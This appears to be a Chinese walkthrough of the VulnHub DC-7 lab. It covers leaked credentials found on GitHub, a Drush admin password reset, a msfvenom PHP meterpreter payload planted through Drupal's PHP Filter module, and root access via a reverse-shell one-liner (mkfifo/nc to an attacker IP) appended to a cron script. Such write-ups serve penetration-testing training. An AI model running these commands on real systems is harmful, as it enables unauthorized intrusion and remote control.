靶机介绍
DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
尽管这不是一个过于技术性的挑战,但这并不容易。
虽然这是从早期DC版本开始的逻辑发展(我不会告诉您哪个),但是其中涉及一些新概念,但是您需要自己弄清楚这些概念。:-)如果您需要求助于暴力破解或字典攻击,您可能不会成功。
您需要做的是在盒子外面思考。
Waaaaaay在盒子外面。:-)
下载地址:https://www.vulnhub.com/entry/dc-7,356/
运用的知识
Github泄露网站数据库配置信息导致泄露SSH Drupal重置网站管理员密码 Drupal8-Getshell 第三方软件提权backups.sh
信息搜集
拿到靶机先扫了扫端口开放服务:
代码语言:javascript复制nmap -A -T4 192.168.1.146
图片1 nmap扫描靶机开放了 22(ssh)、80(http)服务,其中 NMAP 检测出 http 使用的网站是 Drupal 8,我们先打开看看把:
图片2 网页内容打开网站页面之后看到了一段提示信息:
代码语言:javascript复制Welcome to DC-7
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box. :-)随后看了看 robots.txt 文件:
图片3 robots.txt文件
图片4 CHANGELOG.txt内容网站上只有这一个信息,那么我还是去找找有关于这个 CMS 的漏洞把:
图片5 whatweb获取器版本信息由 whatweb 得到的信息它的版本是 Drupal 8,我搜索了有关于这个版本的漏洞发现有这些:
图片6 关于这个版本的漏洞我挨个去利用了相关的 POC ,可惜都没有利用成功!这个时候回过头来再仔细读了一遍网站的提示我发现了一个版权信息:
图片7 版权信息既然作者提示我们说这个靶机的重点不在盒子里,是在盒子外面,而版权信息显示的是:DC7USER,那么会不会跟这个有关呢?
紧接着我抱着好奇心去 Google 搜索了 DC7USER:
图片8 Google搜索DC7USER搜索第一个是它的 Github,我打开看了看发现有一个项目:
图片9 Dc7User的Github点开后我找到了有关线索:
代码语言:javascript复制This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.
This isn't a flag, btw, but if you have made it here, well done anyway. :-)
图片10 一些线索这似乎是网站的源代码?于是我注意力放到了 ·config.php· 这个文件,打开看发现是一个数据库配置信息:
代码语言:javascript复制<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
图片11 config.php登陆SSH
我用得到的账号和密码尝试登陆网站发现登陆失败:
图片12 尝试利用得到的账号密码登录网站后台但是失败随后我尝试登陆 SSH ,登陆成功!
图片13 登录SSH成功挺有意思的啊,这个 CTF 靶机超出了我的想象,有点像真正的渗透测试了,有那个味道了有木有!
随后我发现了一个 mbox 的文件,里面貌似是一封邮件信息:
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EeF-0000Dx-G1
for root@dc-7; Thu, 29 Aug 2019 17:15:11 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Esl-0000Ec-JQ
for root@dc-7; Thu, 29 Aug 2019 17:30:11 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3F7H-0000G3-Nb
for root@dc-7; Thu, 29 Aug 2019 17:45:11 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Hvd-0000ED-CP
for root@dc-7; Thu, 29 Aug 2019 20:45:21 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Jng-0000Iw-Rq
for root@dc-7; Thu, 29 Aug 2019 22:45:16 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3K28-0000Ll-11
for root@dc-7; Thu, 29 Aug 2019 23:00:12 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3LCo-0000Eb-02
for root@dc-7; Fri, 30 Aug 2019 00:15:18 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3O0y-0000Ed-To
for root@dc-7; Fri, 30 Aug 2019 03:15:17 1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
图片14 mbox里的内容仔细看了一看发现它是一个定时脚本:/opt/script/backups.sh
我 ls 查看了一下,发现它只能 root 用户和 www-data 修改它,查看了脚本后好像删除了一些文件还有解压文件等等:
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
图片15 backup.sh内容Drupal重置网站管理员密码
其中的 drush 我并不知道是什么命令,紧接着我去搜索了一波发现它是一个简化了创建和管理Drupal8网站的命令行工具。
相关文章:https://drupalchina.gitbooks.io/begining-drupal8-cn/content/chapters/chapter-15.html
看文档得知 sql-dump是使用mysqldump或等效的操作导出Drupal数据库为SQL的命令!
图片16 SQL命令由于这个脚本上到处数据库所在的目录是 /var/www/html,那么我们也切换到这个目录,随后我用 drush 的命令重置了网站后台的密码:
drush user-password admin --password="pass"
图片17 重置admin账号密码重置完后拿到账号 admin 密码 pass 登陆到了网站后台:
图片18 利用重置完的账号去登陆网站后台Drupal-Getshell
登陆到后台之后,我是 Google 上找到了getshell的方法,先是从 https://www.drupal.org/project/php 下载它的模块:
图片19 下载模块下载完后来到 Extend - Install new module 上传到网站:
图片20 Extend-install new module
图片21 上传
图片22 上传成功然后启用 PHP Filter 模块:
图片23 启动php filter模块启用之后在Content 中添加我们的脚本木马,添加脚本木马前先用 MSF 生成一个 PHP 的木马:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=7777 -f raw
图片24 msf生成php木马紧接着打开 MSF 设置参数开启监听:
图片25 msf开启监听最后添加我们的脚本代码到页面中:
图片26 添加脚本到代码页面1
图片27 添加脚本到代码页面2(PS:如果失败了那么先设置为 PHP code,再把脚本代码放进去保存就可以了)
设置好之后成功反弹得到一枚 shell:
图片28 获得反弹的shell得到shell之后用MSF自带的模块查看有没有可以提权的模块,但是发现没有可利用提权的地方:
图片29 利用msf查找是否存在可以提权的地方先让它切换到 shell 环境把:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
图片30 切换到shell环境利用backups.sh文件提权
随后我们来到了 /opt/scripts 目录下,因为之前我们知道了 backups.sh 它只能 root 用户和 www-data 用户权限去修改它:
图片31 修改Backup.sh权限所以我们就可以利用这段代码来反弹一个 shell 到 KALI,反弹回来的shell自然就是root权限!
先是我们在 KALI nc 监听 8888 ,然后输入这段代码:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8888 >/tmp/f" >> backups.sh
图片32 反弹shell这个时候就成功获取到 root 权限,拿到 FLAG:
图片33 获取root权限,拿到flag相关链接:
VulnHub通关日记-DC_1-Walkthrough
VulnHub通关日记-DC_2-Walkthrough
VulnHub通关日记-DC_3-Walkthrough
VulnHub通关日记-DC_4-Walkthrough
VulnHub通关日记-DC_5-Walkthrough
VulnHub通关日记-DC_6-Walkthrough
